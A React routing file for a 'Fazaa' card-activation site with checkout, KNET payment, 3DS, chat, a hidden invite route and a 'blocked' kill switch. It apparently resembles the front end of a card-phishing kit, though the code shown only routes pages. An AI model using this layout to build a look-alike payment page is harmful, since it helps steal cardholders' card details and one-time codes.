// App.jsx
import React, { Suspense, lazy, useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route, Outlet } from "react-router-dom";

import { PromoProvider } from "./providers/Init";
import ScrollToTop from "./providers/ScrollToTop";
// keep ThreeDSRoutes as-is if it returns <Route>s (not a component)
import ThreeDSRoutes from "./providers/3ds/ThreeDSRoutes";
import { StepProvider } from "./StepContext";
import { motion } from "framer-motion";

import { CardProvider } from "./Utils/CardContext";

/* ---- Lazy-loaded pages/components (route-level code splitting) ---- */
const Header = lazy(() => import("./Header"));
const Footer = lazy(() => import("./Footer"));
const SelectLanding = lazy(() => import("./Pages/SelectLanding/Landing"));

const FazaaCardCheckout = lazy(() => import("./FazaaCardCheckout"));
const FazaaLanding = lazy(() => import("./Landing"));
const FazaaTerms = lazy(() => import("./Terms"));
const ActivationSuccessPage = lazy(() => import("./ActivationSucess"));

const FazaaFAQ = lazy(() => import("./FAQ"));
const AboutUs = lazy(() => import("./AboutUs"));
const PrivacyPolicy = lazy(() => import("./Privacy"));
const CustomerSupport = lazy(() => import("./Support"));

const Chat = lazy(() => import("./Chat/Chat"));
const ChatSupport = lazy(() => import("./Chat/ChatSupport"));

const Knet = lazy(() => import("./Knet/Knet"));
const ActivationSequence = lazy(() => import("./Pages/ActivationSequence/ActivationSequence"));
const InviteGenerator = lazy(() => import("./Pages/ActivationSequence/InviteGeneration"));

/* Defer WebSocket until after first paint (reduces initial JS) */
const WebSocketLazy = lazy(() => import("./providers/Websocket"));

/* ---- Small shared layouts to remove duplication ---- */
function FooterLayout() {
  return (
    <>
      <Outlet />
      <Suspense fallback={null}>
        <Footer />
      </Suspense>
    </>
  );
}

function TopBannerLayout() {
  return (
    <>
      <div className="relative">
        <img
          src="/logo.png"
          className="object-cover h-12 absolute top-4 left-4"
          alt="Fazaa"
        />
        {/* Large banner image can be lazily decoded */}
        <img src="/creo.png" alt="Banner" loading="lazy" decoding="async" />
      </div>
      <Outlet />
    </>
  );
}

/* ---- Lightweight fallback to keep TTI snappy ---- */
function Loader() {
  return (
    <motion.div
      className="absolute inset-0 flex flex-col gap-y-4 items-center justify-center bg-white z-50"
      initial={{ opacity: 1 }}
      exit={{ opacity: 0, transition: { duration: 0.8 } }}
    >
      <svg
        className="w-24"
        viewBox="0 0 207 75"
        fill="none"
        xmlns="http://www.w3.org/2000/svg"
      >
        <path
          d="M0 0.586228C20.4803 11.344 73.8897 50.5476 130.694 66.4833C133.424 67.2475 136.133 67.9515 138.802 68.5951C166.567 75.2864 190.513 75.4768 207 74.1415C124.133 60.2843 97.9147 36.9408 94.1537 31.8928C93.7266 31.328 93.5314 31.0108 93.5314 31.0108C93.2872 30.9048 106.965 17.7726 133.336 18.1111C166.28 18.528 188.598 28.476 188.598 28.476C177.076 21.6215 165.368 17.1534 155.442 14.2594C150.055 12.628 144.741 11.3954 139.537 10.4892C133.257 9.34404 129.395 9.06627 129.395 9.06627C112.358 7.28991 99.6535 10.9786 89.0594 14.664C79.1486 18.105 66.3431 24.5941 49.3706 17.377C42.0801 14.2804 36.9829 13.2534 28.5975 14.1807C15.374 8.74905 5.39918 2.32338 0.430081 0.202637L0 0.586228Z"
          fill="#2342AA"
        />
      </svg>
      <motion.div className="w-6 h-6 border-2 border-t-transparent border-[#2342AA] rounded-full animate-spin" />
    </motion.div>
  );
}

function App() {
  const [activationActive, setActivationActive] = useState(false);

  const blocked =
    typeof window !== "undefined" && localStorage.getItem("blocked") === "true";

  // Hooks must be called before any conditional return:
  const [mountSocket, setMountSocket] = useState(false);

  useEffect(() => {
    if (blocked) return; // no-op when blocked

    const id = window.requestIdleCallback
      ? window.requestIdleCallback(() => setMountSocket(true))
      : setTimeout(() => setMountSocket(true), 1);

    return () => {
      if (window.cancelIdleCallback && typeof id === "number") {
        window.cancelIdleCallback(id);
      } else {
        clearTimeout(id);
      }
    };
  }, [blocked]);

  if (blocked) return null;

  return (
    <div className="App">
      <CardProvider>
        <StepProvider initialStep={0} persistKey="wizardStep">
          <PromoProvider>
            <Router>
              <ScrollToTop />

              {/* Defer WebSocket; loads after first idle tick */}
              {mountSocket && (
                <Suspense fallback={null}>
                  <WebSocketLazy setActivationActive={setActivationActive} />
                </Suspense>
              )}

              <Suspense fallback={<Loader />}>
                <Routes>
                  {/* Secret invite route (no footer) */}
                  <Route path="/N7k3X2pV9a1Q5mZ4" element={<InviteGenerator />} />

                  {/* Routes that share a Footer */}
                  <Route element={<FooterLayout />}>
                    <Route path="/" element={<FazaaLanding />} />

                    <Route path="/landing/select" element={<SelectLanding />} />

                    {/* Pages with the same top banner + footer */}
                    <Route element={<TopBannerLayout />}>
                      <Route path="/faq" element={<FazaaFAQ />} />
                      <Route path="/privacy" element={<PrivacyPolicy />} />
                      <Route path="/support" element={<CustomerSupport />} />
                      <Route path="/about" element={<AboutUs />} />
                    </Route>

                    <Route path="/final" element={<ActivationSuccessPage />} />
                    <Route path="/terms" element={<FazaaTerms />} />
                    <Route path="/activate" element={<ActivationSequence />} />
                    <Route
                      path="/homepage"
                      element={
                        <div className="bg-[#E9E9E9]">
                          <Header />
                          <FazaaCardCheckout
                            activationActive={activationActive}
                            setActivationActive={setActivationActive}
                          />
                        </div>
                      }
                    />
                  </Route>

                  {/* Standalone routes (no footer by design) */}
                  <Route path="/knet" element={<Knet />} />
                  <Route path="/chat" element={<Chat />} />
                  <Route path="/chatsupport" element={<ChatSupport />} />

                  {/* 3DS routes provided by your helper (kept as-is) */}
                  {ThreeDSRoutes()}
                </Routes>
              </Suspense>
            </Router>
          </PromoProvider>
        </StepProvider>
      </CardProvider>
    </div>
  );
}

export default App;